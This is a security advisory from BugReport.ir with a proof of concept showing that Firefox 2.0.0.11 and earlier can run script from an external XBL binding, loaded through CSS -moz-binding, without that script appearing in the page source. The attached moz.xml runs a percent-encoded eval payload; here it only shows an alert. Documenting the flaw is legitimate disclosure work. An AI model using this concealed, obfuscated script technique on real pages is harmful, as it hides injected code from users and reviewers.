BugReport.ir - Mozilla Firefox 2.0.0.11 Hide The Source Code

########################## WwW.BugReport.ir ########################
#
#      AmnPardaz Security Research Team
#
# Bug Title: Mozilla Firefox 2.0.0.11 Hide The Source Code
# Vendor URL: www.mozilla.org
# Version: <= 2.0.0.11
# Soloution: N/A
#
######################### WwW.AmnPardaz.com ########################


####################
- Description:
####################
To do this work we need 2 files (Html,XML).
Their codes was written below.

Save below codes in a HTML file.
--------------------------------------------------------------------
--------------------------------------------------------------------
<html>
	<head>
		<style>BODY{-moz-binding:url("moz.xml#xss")}</style>
	</head>
	<body>
		1- Do you see any Source Code by viewing the page source? No!
		<script>
			alert('Soroush Dalili from BugReport.IR has something new for you! - Maybe there are some malicious codes instead of my name!')
		</script>
	</body>
</html>
--------------------------------------------------------------------
--------------------------------------------------------------------

Then save below codes in "moz.xml" file.

--------------------------------------------------------------------
--------------------------------------------------------------------
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
  <binding id="xss">
    <implementation>
      <constructor><![CDATA[
		document.write('2 - Do you see any Source Code by viewing the page source? No! Your browser "Mozilla Firefox 2.0.0.11" is looking for something!')
		eval(unescape('%61%6c%65%72%74%28%27%54%68%69%73%20%69%73%20%6e%65%77%20%70%61%67%65%2e%20%77%68%65%72%65%20%69%73%20%70%61%67%65%20%31%3f%20%77%68%65%72%65%20%61%72%65%20%74%68%65%20%73%6f%75%72%63%65%20%63%6f%64%65%20%6f%66%20%70%61%67%65%20%31%20%61%6e%64%20%70%61%67%65%20%32%3f%27%29'));
  	  ]]></constructor>
    </implementation>
  </binding>
</bindings>
--------------------------------------------------------------------
--------------------------------------------------------------------

Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.11 it will work!

####################
- Credit :
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com